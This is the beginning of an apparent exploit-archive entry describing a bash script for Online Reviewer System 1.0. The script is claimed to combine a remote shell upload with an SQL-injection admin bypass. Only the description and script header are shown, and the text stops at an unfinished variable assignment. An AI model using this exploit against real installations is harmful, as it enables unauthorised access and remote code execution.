Authored by Richard Jones

Online Reviewer System version 1.0 remote shell upload exploit that also leverages a remote SQL injection vulnerability that allows for authentication bypass.

#!/bin/bash
# Exploit Title: Online Reviewer System (PHPPDO) - RCE & ADMIN BYPASS
# Exploit Author: Richard Jones
# Date: 2021-01-31
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12937&title=Online+Reviewer+System+Using+PHP%2FPDO+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34


RS='